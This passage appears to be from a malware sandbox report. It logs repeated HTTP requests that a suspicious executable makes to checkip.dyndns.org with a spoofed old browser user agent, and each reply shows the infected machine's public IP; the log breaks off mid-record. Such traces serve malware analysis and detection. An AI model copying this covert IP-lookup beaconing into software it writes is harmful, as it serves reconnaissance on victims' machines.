    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 13 | Source IP: 192.168.2.9 | Source Port: 50003 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:20.295130014 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:21.003470898 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:20 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 14 | Source IP: 192.168.2.9 | Source Port: 50005 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:21.973793030 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:22.674274921 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:22 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 15 | Source IP: 192.168.2.9 | Source Port: 50007 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:24.529258013 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:25.224337101 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:25 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 16 | Source IP: 192.168.2.9 | Source Port: 50009 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:26.232584000 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:26.935705900 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:26 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 17 | Source IP: 192.168.2.9 | Source Port: 50011 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:27.877578974 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:28.562705994 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:28 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 18 | Source IP: 192.168.2.9 | Source Port: 50013 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 1072 | Process: C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:29.449084997 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:30.129235983 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:30 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 50015 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:31.081629038 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:31.791682005 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:31 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 50017 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:32.726120949 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:33.409117937 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:33 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 50019 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:34.316557884 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:35.010158062 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:34 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 50021 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:35.911058903 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:36.591614962 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:36 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 50023 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:37.526413918 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:38.196589947 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:38 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 50025 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:39.051131010 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:39.750917912 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:39 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 50027 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:40.823911905 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:41.525806904 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:41 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 50029 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:42.375016928 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:43.047513008 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:42 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 50031 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:43.994162083 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:44.685190916 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:44 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 50033 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:45.645616055 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:46.317318916 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:46 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 50035 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:47.257117033 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:47.939408064 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:47 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 50037 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:48.893722057 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 23:12:49.585043907 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:12:49 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.9 | 50039 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:50.417284012 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Jan 10, 2025 23:12:51.114533901 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:51 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.9 | 50041 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:52.098161936 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Jan 10, 2025 23:12:52.793376923 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.9 | 50043 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:53.735686064 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Jan 10, 2025 23:12:54.435216904 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.9 | 50045 | 132.226.247.73 | 80 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:12:55.293111086 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
Jan 10, 2025 23:12:55.965363026 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:55 GMT
